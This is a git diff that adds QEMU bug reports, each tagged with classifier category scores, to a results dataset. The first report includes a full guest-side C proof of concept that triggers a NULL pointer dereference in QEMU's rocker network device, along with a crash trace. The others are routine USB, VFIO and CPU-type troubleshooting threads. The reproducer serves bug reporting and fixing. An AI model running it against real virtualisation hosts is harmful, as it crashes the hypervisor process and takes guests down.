Diffstat (limited to '')
| -rw-r--r-- | results/classifier/108/other/1851 | 450 | ||||
| -rw-r--r-- | results/classifier/108/other/1851547 | 69 | ||||
| -rw-r--r-- | results/classifier/108/other/1851664 | 52 | ||||
| -rw-r--r-- | results/classifier/108/other/1851845 | 43 | ||||
| -rw-r--r-- | results/classifier/108/other/1851939 | 36 | ||||
| -rw-r--r-- | results/classifier/108/other/1851972 | 137 |
6 files changed, 787 insertions, 0 deletions
diff --git a/results/classifier/108/other/1851 b/results/classifier/108/other/1851
new file mode 100644
index 000000000..d4b6c1e76
--- /dev/null
+++ b/results/classifier/108/other/1851
@@ -0,0 +1,450 @@ +device: 0.793 +other: 0.757 +graphic: 0.755 +permissions: 0.744 +performance: 0.744 +socket: 0.662 +network: 0.648 +files: 0.629 +PID: 0.619 +KVM: 0.614 +vnc: 0.598 +debug: 0.595 +boot: 0.578 +semantic: 0.545 + +hw/net/rocker: NULL pointer dereference in of_dpa_cmd_add_l2_flood +Description of problem: +rocker_tlv_parse_nested could return early because of no group ids in the group_tlvs. In such case tlvs is NULL; tlvs\[i + 1\] in the next for-loop will deref the NULL pointer. +Steps to reproduce: +Compile and run the following code within the guest: + +``` +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <assert.h> +#include <fcntl.h> +#include <inttypes.h> +#include <sys/mman.h> +#include <sys/types.h> +#include <sys/stat.h> +#include <unistd.h> +#include <sys/io.h> +#include <stdint.h> +#include <stdbool.h> +#include <err.h> +#include <errno.h> +#include <pthread.h> + +/* + * Rocker DMA ring register offsets + */ +#define ROCKER_DMA_DESC_BASE 0x1000 +#define ROCKER_DMA_DESC_SIZE 32 +#define ROCKER_DMA_DESC_MASK 0x1F +#define ROCKER_DMA_DESC_TOTAL_SIZE \ + (ROCKER_DMA_DESC_SIZE * 64) /* 62 ports + event + cmd */ +#define ROCKER_DMA_DESC_ADDR_OFFSET 0x00 /* 8-byte */ +#define ROCKER_DMA_DESC_SIZE_OFFSET 0x08 +#define ROCKER_DMA_DESC_HEAD_OFFSET 0x0c +#define ROCKER_DMA_DESC_TAIL_OFFSET 0x10 +#define ROCKER_DMA_DESC_CTRL_OFFSET 0x14 +#define ROCKER_DMA_DESC_CREDITS_OFFSET 0x18 +#define ROCKER_DMA_DESC_RSVD_OFFSET 0x1c + +/* + * Rocker dma ctrl register bits + */ +#define ROCKER_DMA_DESC_CTRL_RESET (1 << 0) + +/* + * Rocker test registers + */ +#define ROCKER_TEST_REG 0x0010 +#define ROCKER_TEST_REG64 0x0018 /* 8-byte */ +#define ROCKER_TEST_IRQ 0x0020 +#define ROCKER_TEST_DMA_ADDR 0x0028 /* 8-byte */ +#define ROCKER_TEST_DMA_SIZE 0x0030 +#define ROCKER_TEST_DMA_CTRL 0x0034 + +/* + * Rocker general purpose registers + */ +#define ROCKER_CONTROL 0x0300 +#define ROCKER_PORT_PHYS_COUNT 0x0304 +#define 
ROCKER_PORT_PHYS_LINK_STATUS 0x0310 /* 8-byte */ +#define ROCKER_PORT_PHYS_ENABLE 0x0318 /* 8-byte */ +#define ROCKER_SWITCH_ID 0x0320 /* 8-byte */ + +/* + * Rocker test register ctrl + */ +#define ROCKER_TEST_DMA_CTRL_CLEAR (1 << 0) +#define ROCKER_TEST_DMA_CTRL_FILL (1 << 1) +#define ROCKER_TEST_DMA_CTRL_INVERT (1 << 2) + +#define __le16 uint16_t +#define __le32 uint32_t +#define __le64 uint64_t + +typedef struct rocker_desc { + __le64 buf_addr; + uint64_t cookie; + __le16 buf_size; + __le16 tlv_size; + __le16 rsvd[5]; /* pad to 32 bytes */ + __le16 comp_err; +} __attribute__((packed, aligned(8))) RockerDesc; + + +/* + * Rocker TLV type fields + */ + +typedef struct rocker_tlv { + __le32 type; + __le16 len; + __le16 rsvd; +} __attribute__((packed, aligned(8))) RockerTlv; + + +typedef struct cmd_group_msg { + RockerTlv tlv1; + __le64 t1_value; + RockerTlv tlv2; + __le64 t2_value; + RockerTlv tlv3; + __le64 t3_value; +} __attribute__((packed, aligned(8))) CmdGroupMsg; + + +typedef struct cmd_msg { + RockerTlv tlv1; + __le64 t1_value; + RockerTlv tlv2; + CmdGroupMsg group_msg; +} __attribute__((packed, aligned(8))) CmdMsg; + + +typedef struct rx_msg { + RockerTlv tlv1; + __le64 t1_value; + RockerTlv tlv2; + __le64 t2_value; + RockerTlv tlv3; + __le64 t3_value; + RockerTlv tlv4; + __le64 t4_value; + RockerTlv tlv5; + __le64 t5_value; +} __attribute__((packed, aligned(8))) RxMsg; + + +/* Rx msg */ +enum { + ROCKER_TLV_RX_UNSPEC, + ROCKER_TLV_RX_FLAGS, /* u16, see RX_FLAGS_ */ + ROCKER_TLV_RX_CSUM, /* u16 */ + ROCKER_TLV_RX_FRAG_ADDR, /* u64 */ + ROCKER_TLV_RX_FRAG_MAX_LEN, /* u16 */ + ROCKER_TLV_RX_FRAG_LEN, /* u16 */ + + __ROCKER_TLV_RX_MAX, + ROCKER_TLV_RX_MAX = __ROCKER_TLV_RX_MAX - 1, +}; + +/* Tx msg */ +enum { + ROCKER_TLV_TX_UNSPEC, + ROCKER_TLV_TX_OFFLOAD, /* u8, see TX_OFFLOAD_ */ + ROCKER_TLV_TX_L3_CSUM_OFF, /* u16 */ + ROCKER_TLV_TX_TSO_MSS, /* u16 */ + ROCKER_TLV_TX_TSO_HDR_LEN, /* u16 */ + ROCKER_TLV_TX_FRAGS, /* array */ + + __ROCKER_TLV_TX_MAX, + 
ROCKER_TLV_TX_MAX = __ROCKER_TLV_TX_MAX - 1, +}; + +/* cmd msg */ +enum { + ROCKER_TLV_CMD_UNSPEC, + ROCKER_TLV_CMD_TYPE, /* u16 */ + ROCKER_TLV_CMD_INFO, /* nest */ + + __ROCKER_TLV_CMD_MAX, + ROCKER_TLV_CMD_MAX = __ROCKER_TLV_CMD_MAX - 1, +}; + +enum { + ROCKER_TLV_CMD_TYPE_UNSPEC, + ROCKER_TLV_CMD_TYPE_GET_PORT_SETTINGS, + ROCKER_TLV_CMD_TYPE_SET_PORT_SETTINGS, + ROCKER_TLV_CMD_TYPE_OF_DPA_FLOW_ADD, + ROCKER_TLV_CMD_TYPE_OF_DPA_FLOW_MOD, + ROCKER_TLV_CMD_TYPE_OF_DPA_FLOW_DEL, + ROCKER_TLV_CMD_TYPE_OF_DPA_FLOW_GET_STATS, + ROCKER_TLV_CMD_TYPE_OF_DPA_GROUP_ADD, + ROCKER_TLV_CMD_TYPE_OF_DPA_GROUP_MOD, + ROCKER_TLV_CMD_TYPE_OF_DPA_GROUP_DEL, + ROCKER_TLV_CMD_TYPE_OF_DPA_GROUP_GET_STATS, + + __ROCKER_TLV_CMD_TYPE_MAX, + ROCKER_TLV_CMD_TYPE_MAX = __ROCKER_TLV_CMD_TYPE_MAX - 1, +}; + +/* + * cmd info nested for OF-DPA msgs + */ + +enum { + ROCKER_TLV_OF_DPA_UNSPEC, + ROCKER_TLV_OF_DPA_TABLE_ID, /* u16 */ + ROCKER_TLV_OF_DPA_PRIORITY, /* u32 */ + ROCKER_TLV_OF_DPA_HARDTIME, /* u32 */ + ROCKER_TLV_OF_DPA_IDLETIME, /* u32 */ + ROCKER_TLV_OF_DPA_COOKIE, /* u64 */ + ROCKER_TLV_OF_DPA_IN_PPORT, /* u32 */ + ROCKER_TLV_OF_DPA_IN_PPORT_MASK, /* u32 */ + ROCKER_TLV_OF_DPA_OUT_PPORT, /* u32 */ + ROCKER_TLV_OF_DPA_GOTO_TABLE_ID, /* u16 */ + ROCKER_TLV_OF_DPA_GROUP_ID, /* u32 */ + ROCKER_TLV_OF_DPA_GROUP_ID_LOWER, /* u32 */ + ROCKER_TLV_OF_DPA_GROUP_COUNT, /* u16 */ + ROCKER_TLV_OF_DPA_GROUP_IDS, /* u32 array */ + ROCKER_TLV_OF_DPA_VLAN_ID, /* __be16 */ + ROCKER_TLV_OF_DPA_VLAN_ID_MASK, /* __be16 */ + ROCKER_TLV_OF_DPA_VLAN_PCP, /* __be16 */ + ROCKER_TLV_OF_DPA_VLAN_PCP_MASK, /* __be16 */ + ROCKER_TLV_OF_DPA_VLAN_PCP_ACTION, /* u8 */ + ROCKER_TLV_OF_DPA_NEW_VLAN_ID, /* __be16 */ + ROCKER_TLV_OF_DPA_NEW_VLAN_PCP, /* u8 */ + ROCKER_TLV_OF_DPA_TUNNEL_ID, /* u32 */ + ROCKER_TLV_OF_DPA_TUNNEL_LPORT, /* u32 */ + ROCKER_TLV_OF_DPA_ETHERTYPE, /* __be16 */ + ROCKER_TLV_OF_DPA_DST_MAC, /* binary */ + ROCKER_TLV_OF_DPA_DST_MAC_MASK, /* binary */ + ROCKER_TLV_OF_DPA_SRC_MAC, /* binary */ + 
ROCKER_TLV_OF_DPA_SRC_MAC_MASK, /* binary */ + ROCKER_TLV_OF_DPA_IP_PROTO, /* u8 */ + ROCKER_TLV_OF_DPA_IP_PROTO_MASK, /* u8 */ + ROCKER_TLV_OF_DPA_IP_DSCP, /* u8 */ + ROCKER_TLV_OF_DPA_IP_DSCP_MASK, /* u8 */ + ROCKER_TLV_OF_DPA_IP_DSCP_ACTION, /* u8 */ + ROCKER_TLV_OF_DPA_NEW_IP_DSCP, /* u8 */ + ROCKER_TLV_OF_DPA_IP_ECN, /* u8 */ + ROCKER_TLV_OF_DPA_IP_ECN_MASK, /* u8 */ + ROCKER_TLV_OF_DPA_DST_IP, /* __be32 */ + ROCKER_TLV_OF_DPA_DST_IP_MASK, /* __be32 */ + ROCKER_TLV_OF_DPA_SRC_IP, /* __be32 */ + ROCKER_TLV_OF_DPA_SRC_IP_MASK, /* __be32 */ + ROCKER_TLV_OF_DPA_DST_IPV6, /* binary */ + ROCKER_TLV_OF_DPA_DST_IPV6_MASK, /* binary */ + ROCKER_TLV_OF_DPA_SRC_IPV6, /* binary */ + ROCKER_TLV_OF_DPA_SRC_IPV6_MASK, /* binary */ + ROCKER_TLV_OF_DPA_SRC_ARP_IP, /* __be32 */ + ROCKER_TLV_OF_DPA_SRC_ARP_IP_MASK, /* __be32 */ + ROCKER_TLV_OF_DPA_L4_DST_PORT, /* __be16 */ + ROCKER_TLV_OF_DPA_L4_DST_PORT_MASK, /* __be16 */ + ROCKER_TLV_OF_DPA_L4_SRC_PORT, /* __be16 */ + ROCKER_TLV_OF_DPA_L4_SRC_PORT_MASK, /* __be16 */ + ROCKER_TLV_OF_DPA_ICMP_TYPE, /* u8 */ + ROCKER_TLV_OF_DPA_ICMP_TYPE_MASK, /* u8 */ + ROCKER_TLV_OF_DPA_ICMP_CODE, /* u8 */ + ROCKER_TLV_OF_DPA_ICMP_CODE_MASK, /* u8 */ + ROCKER_TLV_OF_DPA_IPV6_LABEL, /* __be32 */ + ROCKER_TLV_OF_DPA_IPV6_LABEL_MASK, /* __be32 */ + ROCKER_TLV_OF_DPA_QUEUE_ID_ACTION, /* u8 */ + ROCKER_TLV_OF_DPA_NEW_QUEUE_ID, /* u8 */ + ROCKER_TLV_OF_DPA_CLEAR_ACTIONS, /* u32 */ + ROCKER_TLV_OF_DPA_POP_VLAN, /* u8 */ + ROCKER_TLV_OF_DPA_TTL_CHECK, /* u8 */ + ROCKER_TLV_OF_DPA_COPY_CPU_ACTION, /* u8 */ + + __ROCKER_TLV_OF_DPA_MAX, + ROCKER_TLV_OF_DPA_MAX = __ROCKER_TLV_OF_DPA_MAX - 1, +}; + +#define PAGE_SHIFT 12 +#define PAGE_SIZE (1 << PAGE_SHIFT) +#define PFN_PRESENT (1ull << 63) +#define PFN_PFN ((1ull << 55) - 1) + +uint64_t get_physical_pfn(void* ptr) +{ + uint64_t pfn = -1; + FILE* fp = fopen("/proc/self/pagemap", "rb"); + if (!fp) + { + return pfn; + } + + if (!fseek(fp, (unsigned long)ptr / PAGE_SIZE * 8, SEEK_SET)) + { + fread(&pfn, 
sizeof(pfn), 1, fp); + if (pfn & PFN_PRESENT) + { + pfn &= PFN_PFN; + } + } + fclose(fp); + return pfn; +} + +uint64_t get_physical_addr(void* ptr) +{ + uint64_t pfn = get_physical_pfn(ptr); + return pfn * PAGE_SIZE + (uint64_t)ptr % PAGE_SIZE; +} + +void* mmio_mem; + +void mmio_write(uint32_t addr, uint32_t value) +{ + *((uint32_t*)(mmio_mem + addr))= value; +} + +void mmio_write64(uint32_t addr, uint64_t value) +{ + *((uint64_t*)(mmio_mem + addr))= value; +} + +uint64_t mmio_read(uint32_t addr) +{ + return *((uint64_t*)(mmio_mem +addr)); +} + +uint64_t mmio_read64(uint64_t addr) +{ + return *((uint64_t*)(mmio_mem +addr)); +} + +uint64_t ring_desk_base_addr(int index) +{ + return ROCKER_DMA_DESC_BASE + index * 32; +} + +int main() +{ + int mmio_fd= open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC); + if (mmio_fd== -1) { + printf("mmio_fd open failed"); + return 1; + } + + mmio_mem = mmap(0, 0x2000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0); + if (mmio_mem == MAP_FAILED) { + printf("mmap mmio_mem failed"); + return 1; + } + + iopl(3); + + RockerTlv cmd_group_tlv = {ROCKER_TLV_OF_DPA_GROUP_ID, sizeof(RockerTlv) + sizeof(__le64), 12345 }; + RockerTlv cmd_count_tlv = {ROCKER_TLV_OF_DPA_GROUP_COUNT, sizeof(RockerTlv) + sizeof(__le64), 12345}; + RockerTlv cmd_ids_tlv = {ROCKER_TLV_OF_DPA_GROUP_IDS, sizeof(RockerTlv) + sizeof(__le64), 12345 }; + + CmdGroupMsg group_msg = { cmd_group_tlv, 0x40000000, cmd_count_tlv, 65535, cmd_ids_tlv, 12345}; + + RockerTlv cmd_type_tlv = {ROCKER_TLV_CMD_TYPE, sizeof(RockerTlv) + sizeof(__le64), 12345 }; + RockerTlv cmd_info_tlv = {ROCKER_TLV_CMD_INFO, sizeof(RockerTlv) + sizeof(CmdGroupMsg), 12345 }; + CmdMsg cmd_msg = {cmd_type_tlv, ROCKER_TLV_CMD_TYPE_OF_DPA_GROUP_ADD, cmd_info_tlv, group_msg }; + RockerDesc cmd_desc = {get_physical_addr(&cmd_msg), 0xdeadbeef, sizeof(CmdMsg), sizeof(CmdMsg), 0x1, 0x4242 }; + + mmio_write64(ROCKER_PORT_PHYS_ENABLE, 0xE); + + // cmd ring + mmio_write(ring_desk_base_addr(0) + 
ROCKER_DMA_DESC_CTRL_OFFSET, ROCKER_DMA_DESC_CTRL_RESET); + // base_addr + mmio_write64(ring_desk_base_addr(0), get_physical_addr(&cmd_desc)); + mmio_write(ring_desk_base_addr(0) + ROCKER_DMA_DESC_SIZE_OFFSET, 8); + mmio_write(ring_desk_base_addr(0) + ROCKER_DMA_DESC_HEAD_OFFSET, 4); + + printf("End\n"); + return 0; +} +``` + +Stack trace: + +```plaintext +=================================================================================================== +ldl_he_p(const void * ptr) (/home/arayz/arayz/qemu-git-e1000e/include/qemu/bswap.h:359) +ldl_le_p(const void * ptr) (/home/arayz/arayz/qemu-git-e1000e/include/qemu/bswap.h:394) +rocker_tlv_get_le32(const RockerTlv * tlv) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_tlv.h:114) +of_dpa_cmd_add_l2_flood(OfDpa * of_dpa, OfDpaGroup * group, RockerTlv ** group_tlvs) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_of_dpa.c:2043) +of_dpa_cmd_group_do(OfDpa * of_dpa, uint32_t group_id, OfDpaGroup * group, RockerTlv ** group_tlvs) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_of_dpa.c:2125) +of_dpa_cmd_group_add(OfDpa * of_dpa, uint32_t group_id, RockerTlv ** group_tlvs) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_of_dpa.c:2145) +of_dpa_group_cmd(OfDpa * of_dpa, struct desc_info * info, char * buf, uint16_t cmd, RockerTlv ** group_tlvs) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_of_dpa.c:2204) +of_dpa_cmd(World * world, struct desc_info * info, char * buf, uint16_t cmd, RockerTlv * cmd_info_tlv) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_of_dpa.c:2234) +world_do_cmd(World * world, DescInfo * info, char * buf, uint16_t cmd, RockerTlv * cmd_info_tlv) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_world.c:43) +cmd_consume(Rocker * r, DescInfo * info) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker.c:450) +ring_pump(DescRing * ring) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_desc.c:242) +desc_ring_set_head(DescRing * ring, uint32_t 
new) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_desc.c:281) +rocker_io_writel(void * opaque, hwaddr addr, uint32_t val) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker.c:805) +rocker_mmio_write(void * opaque, hwaddr addr, uint64_t val, unsigned int size) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker.c:996) +memory_region_write_accessor(MemoryRegion * mr, hwaddr addr, uint64_t * value, unsigned int size, int shift, uint64_t mask, MemTxAttrs attrs) (/home/arayz/arayz/qemu-git-e1000e/softmmu/memory.c:492) +access_with_adjusted_size(hwaddr addr, uint64_t * value, unsigned int size, unsigned int access_size_min, unsigned int access_size_max, MemTxResult (*)(MemoryRegion *, hwaddr, uint64_t *, unsigned int, int, uint64_t, MemTxAttrs) access_fn, MemoryRegion * mr, MemTxAttrs attrs) (/home/arayz/arayz/qemu-git-e1000e/softmmu/memory.c:554) +memory_region_dispatch_write(MemoryRegion * mr, hwaddr addr, uint64_t data, MemOp op, MemTxAttrs attrs) (/home/arayz/arayz/qemu-git-e1000e/softmmu/memory.c:1514) +flatview_write_continue(FlatView * fv, hwaddr addr, MemTxAttrs attrs, const void * ptr, hwaddr len, hwaddr addr1, hwaddr l, MemoryRegion * mr) (/home/arayz/arayz/qemu-git-e1000e/softmmu/physmem.c:2783) +flatview_write(FlatView * fv, hwaddr addr, MemTxAttrs attrs, const void * buf, hwaddr len) (/home/arayz/arayz/qemu-git-e1000e/softmmu/physmem.c:2823) +address_space_write(AddressSpace * as, hwaddr addr, MemTxAttrs attrs, const void * buf, hwaddr len) (/home/arayz/arayz/qemu-git-e1000e/softmmu/physmem.c:2915) +address_space_rw(AddressSpace * as, hwaddr addr, MemTxAttrs attrs, void * buf, hwaddr len, _Bool is_write) (/home/arayz/arayz/qemu-git-e1000e/softmmu/physmem.c:2925) +kvm_cpu_exec(CPUState * cpu) (/home/arayz/arayz/qemu-git-e1000e/accel/kvm/kvm-all.c:2929) +kvm_vcpu_thread_fn(void * arg) (/home/arayz/arayz/qemu-git-e1000e/accel/kvm/kvm-accel-ops.c:49) +qemu_thread_start(void * args) 
(/home/arayz/arayz/qemu-git-e1000e/util/qemu-thread-posix.c:556) +libpthread.so.0!start_thread(void * arg) (/build/glibc-sMfBJT/glibc-2.31/nptl/pthread_create.c:477) +libc.so.6!clone() (/build/glibc-sMfBJT/glibc-2.31/sysdeps/unix/sysv/linux/x86_64/clone.S:95) +=================================================================================================== + + disassemble and register context: +=================================================================================================== +Dump of assembler code for function ldl_he_p: + 0x000055d8a1a473e6 <+0>: push %rbp + 0x000055d8a1a473e7 <+1>: mov %rsp,%rbp + 0x000055d8a1a473ea <+4>: sub $0x20,%rsp + 0x000055d8a1a473ee <+8>: mov %rdi,-0x18(%rbp) + 0x000055d8a1a473f2 <+12>: mov %fs:0x28,%rax + 0x000055d8a1a473fb <+21>: mov %rax,-0x8(%rbp) + 0x000055d8a1a473ff <+25>: xor %eax,%eax + 0x000055d8a1a47401 <+27>: mov -0x18(%rbp),%rax +=> 0x000055d8a1a47405 <+31>: mov (%rax),%eax + 0x000055d8a1a47407 <+33>: mov %eax,-0xc(%rbp) + 0x000055d8a1a4740a <+36>: mov -0xc(%rbp),%eax + 0x000055d8a1a4740d <+39>: mov -0x8(%rbp),%rdx + 0x000055d8a1a47411 <+43>: xor %fs:0x28,%rdx + 0x000055d8a1a4741a <+52>: je 0x55d8a1a47421 <ldl_he_p+59> + 0x000055d8a1a4741c <+54>: callq 0x55d8a186d6d0 <__stack_chk_fail@plt> + 0x000055d8a1a47421 <+59>: leaveq + 0x000055d8a1a47422 <+60>: retq +End of assembler dump. 
+ +rax 0x8 8 +rbx 0x7f7828088ac0 140154044451520 +rcx 0x0 0 +rdx 0x7f7828088ac0 140154044451520 +rsi 0x8 8 +rdi 0x8 8 +rbp 0x7f7832cfd100 0x7f7832cfd100 +rsp 0x7f7832cfd0e0 0x7f7832cfd0e0 +r8 0x7f7828088ac0 140154044451520 +r9 0x7f7828000790 140154043893648 +r10 0x7f78280008d0 140154043893968 +r11 0x7f7828000080 140154043891840 +r12 0x7ffec007cb1e 140732120156958 +r13 0x7ffec007cb1f 140732120156959 +r14 0x7ffec007cbe0 140732120157152 +r15 0x7f7832cfdb00 140154225285888 +rip 0x55d8a1a47405 0x55d8a1a47405 <ldl_he_p+31> +eflags 0x10246 [ PF ZF IF RF ] +cs 0x33 51 +ss 0x2b 43 +ds 0x0 0 +es 0x0 0 +fs 0x0 0 +gs 0x0 0 +=================================================================================================== +``` +Additional information: +This was wrongly assigned a high-severity CVE and is being discussed on qemu-devel ML: https://lists.nongnu.org/archive/html/qemu-devel/2023-08/msg04621.html diff --git a/results/classifier/108/other/1851547 b/results/classifier/108/other/1851547 new file mode 100644 index 000000000..dff728411 --- /dev/null +++ b/results/classifier/108/other/1851547 
@@ -0,0 +1,69 @@ +other: 0.703 +permissions: 0.680 +debug: 0.636 +network: 0.597 +PID: 0.595 +vnc: 0.592 +semantic: 0.585 +KVM: 0.556 +device: 0.553 +performance: 0.546 +graphic: 0.539 +boot: 0.521 +socket: 0.467 +files: 0.444 + +qemu 4 crashes with this parameter attached -usb -device usb-host,hostbus=1,hostaddr=7 \ + +Hello. + +qemu / kvm does not start anymore after upgrading ubuntu from 19.04 to 19.10 and qemu from 3 to 4,as you can see below. what can I do ? + +root@ziomario-Z390-AORUS-PRO:/home/ziomario/Scrivania/OS-KVM# ./boot-OS-HSP2.sh + +----> qemu-system-x86_64: /build/qemu-UryNDZ/qemu-4.0+dfsg/hw/usb/core.c:720: usb_ep_get: asserzione "dev != NULL" non riuscita. + +./boot-OS-HSP2.sh: riga 40: 26312 Annullato (core dump creato) qemu-system-x86_64 -enable-kvm -m 16000 -cpu Penryn,kvm=on,vendor=GenuineIntel,+invtsc,vmware-cpuid-freq=on,$MY_OPTIONS -machine pc-q35-2.9 -smp 4,cores=2 -vga none -device vfio-pci,host=01:00.0,bus=pcie.0,multifunction=on -device vfio-pci,host=01:00.1,bus=pcie.0 -device vfio-pci,host=01:00.2,bus=pcie.0 -device vfio-pci,host=01:00.3,bus=pcie.0 -usb -device usb-host,hostbus=1,hostaddr=7 -drive if=pflash,format=raw,readonly,file=$OVMF/OVMF_CODE.fd -drive if=pflash,format=raw,file=$OVMF/OVMF_VARS-1024x768.fd -smbios type=2 -device ich9-ahci,id=sata -drive id=Clover,if=none,snapshot=on,format=qcow2,file=./'Mo/CloverNG.qcow2' -device ide-hd,bus=sata.2,drive=Clover -device ide-hd,bus=sata.3,drive=InstallMedia -drive id=InstallMedia,if=none,file=BaseSystemHS.img,format=raw -drive id=BsdHDD,if=none,file=/dev/sdg,format=raw -device ide-hd,bus=sata.4,drive=BsdHDD -netdev tap,id=net0,ifname=tap0,script=no,downscript=no -device e1000-82545em,netdev=net0,id=net0,mac=52:54:00:c9:18:27 -monitor stdio + +It seems that this line is not good anymore (it worked with qemu 3.x) : + +-usb -device usb-host,hostbus=1,hostaddr=7 \ + +when I removed it,it works. But I need that. With what can I change it ? 
You can reproduce that upgrading ubuntu 19.04 to 19.10 because in that way also qemu will be upgraded from 3 to 4. These are the packages that I'm using : + +root@ziomario-Z390-AORUS-PRO:/home/ziomario# qemu-system-x86_64 --version +QEMU emulator version 4.0.0 (Debian 1:4.0+dfsg-0ubuntu9) + +problem resolved changing this line : + +-usb -device usb-host,hostbus=1,hostaddr=7 \ + +with this : + +-usb -device usb-host,hostbus=1,hostaddr=8 \ + +it works with qemu 4. + +Hi Marietto, + Can you attach an lsusb output from your host? +I'm curious what host bug 1, addr 7 and 8 are. + +Dave + +001:008 Compx 2.4G Receiver. Problem arise because I've detached one of my USB disk and the numbering of the USB devices attached changed. specially the compx 2.4g receiver changed from hostaddr 7 to 8 and when this happens qemu 4 seems to work not as good as qemu 3. + +The QEMU project is currently considering to move its bug tracking to +another system. For this we need to know which bugs are still valid +and which could be closed already. Thus we are setting older bugs to +"Incomplete" now. + +If you still think this bug report here is valid, then please switch +the state back to "New" within the next 60 days, otherwise this report +will be marked as "Expired". Or please mark it as "Fix Released" if +the problem has been solved with a newer version of QEMU already. + +Thank you and sorry for the inconvenience. + + +[Expired for QEMU because there has been no activity for 60 days.] + diff --git a/results/classifier/108/other/1851664 b/results/classifier/108/other/1851664 new file mode 100644 index 000000000..102d17910 --- /dev/null +++ b/results/classifier/108/other/1851664 
@@ -0,0 +1,52 @@ +performance: 0.660 +graphic: 0.545 +semantic: 0.528 +device: 0.510 +other: 0.445 +network: 0.396 +boot: 0.396 +KVM: 0.381 +PID: 0.376 +socket: 0.372 +permissions: 0.336 +files: 0.332 +debug: 0.326 +vnc: 0.187 + +qemu-system-x86_64: "VFIO_MAP_DMA : -28" error when we attache 6 VF's to guest machine + +We are trying to attach 6 VF's to the guest machine on 4.1.1 qemu emulator. +We are observing "VFIO_MAP_DMA : -28" error. + +We are using w-bits=48 bits while lunching VM. + +Please provide information how you started QEMU, and some information about your PCI device (e.g. the output of lspci). + +qemu-system-x86_64 -name guest=fedora24 -machine q35,accel=kvm,kernel-irqchip=split \ + -enable-kvm \ + -m 4G \ + -smp 8,sockets=1,cores=8,threads=1 \ + -device intel-iommu,intremap=on,caching-mode=on,aw-bits=48 \ + -drive file=<OS_IMAGE_FILE>,format=raw \ + -device ioh3420,id=pcie.1,chassis=1 \ + -device virtio-net-pci,bus=pcie.1,disable-legacy=on,disable-modern=off,iommu_platform=on,ats=on,netdev=net0 \ + -netdev user,id=net0,hostfwd=tcp::1111-:22\ + -device vfio-pci,host=3f:02.1 \ + -device vfio-pci,host=3f:02.2 \ + -device vfio-pci,host=3f:02.3 \ + -device vfio-pci,host=3f:02.4 \ + -device vfio-pci,host=3d:02.4 \ + -device vfio-pci,host=3d:02.5 \ + -device vfio-pci,host=3d:02.6 \ + -nographic + +Please find the above qemu command to lunch guest machine + +Presumably w-bits (aw-bits?) implies using intel-iommu, there's a opportunity for the vfio iommu backend to return -ENOSPC (-28) if we exceed the default number of in-flight DMA mappings per container. The default limit is 65535. You can try increasing this by changing the dma_entry_limit module option on the vfio_iommu_type1 module. Note that in a typical vIOMMU config there's a container per device, so the number of VFs attached is possibly not a factor. 
It is however a lot of DMA mappings for a single device if this is the issue and you'd generally want to boot the guest with iommu=pt in order to have reasonable assigned device performance with a vIOMMU, which would also greatly reduce the number of mappings. + +After increasing dma_entry_limit limit no issue observed. + +But ideal senario device is getting hung and recovery happening only with host hard rebooting. + +[Expired for QEMU because there has been no activity for 60 days.] + diff --git a/results/classifier/108/other/1851845 b/results/classifier/108/other/1851845 new file mode 100644 index 000000000..e91d4acac --- /dev/null +++ b/results/classifier/108/other/1851845 
@@ -0,0 +1,43 @@ +permissions: 0.896 +files: 0.878 +other: 0.875 +debug: 0.875 +graphic: 0.867 +performance: 0.867 +vnc: 0.861 +KVM: 0.841 +device: 0.839 +boot: 0.837 +socket: 0.829 +network: 0.827 +semantic: 0.826 +PID: 0.808 + +Windows 10 panics with BlueIris + +Running Windows 10 64bit. Starting BlueIris 64 bit causes Windows to panic with CPU type is set higher than Penryn or CPU type = host. + +I have been able to reproduce the same issue on Proxmox 4,5,6 as well as oVirt 3. and 4. + +Does not panic when CPU type is set to kvm64. + + +pve-qemu-kvm/stable 4.0.1-4 amd64 + + /usr/bin/kvm -id 102 -name win7-01 -chardev socket,id=qmp,path=/var/run/qemu-server/102.qmp,server,nowait -mon chardev=qmp,mode=control -chardev socket,id=qmp-event,path=/var/run/qmeventd.sock,reconnect=5 -mon chardev=qmp-event,mode=control -pidfile /var/run/qemu-server/102.pid -daemonize -smbios type=1,uuid=3ec61114-c30c-4719-aa00-f3f05be22d48 -smp 8,sockets=1,cores=8,maxcpus=8 -nodefaults -boot menu=on,strict=on,reboot-timeout=1000,splash=/usr/share/qemu-server/bootsplash.jpg -vnc unix:/var/run/qemu-server/102.vnc,password -no-hpet -cpu penryn,+lahf_lm,+sep,+kvm_pv_unhalt,+kvm_pv_eoi,hv_spinlocks=0x1fff,hv_vapic,hv_time,hv_reset,hv_vpindex,hv_runtime,hv_relaxed,hv_synic,hv_stimer,hv_ipi,enforce -m 12000 -device pci-bridge,id=pci.2,chassis_nr=2,bus=pci.0,addr=0x1f -device pci-bridge,id=pci.1,chassis_nr=1,bus=pci.0,addr=0x1e -device vmgenid,guid=50deb929-1974-4fd0-9ad3-71722149d568 -device piix3-usb-uhci,id=uhci,bus=pci.0,addr=0x1.0x2 -device usb-tablet,id=tablet,bus=uhci.0,port=1 -device VGA,id=vga,bus=pci.0,addr=0x2 -chardev socket,path=/var/run/qemu-server/102.qga,server,nowait,id=qga0 -device virtio-serial,id=qga0,bus=pci.0,addr=0x8 -device virtserialport,chardev=qga0,name=org.qemu.guest_agent.0 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x3 -iscsi initiator-name=iqn.1993-08.org.debian:01:203582cea152 -drive if=none,id=drive-ide2,media=cdrom,aio=threads -device 
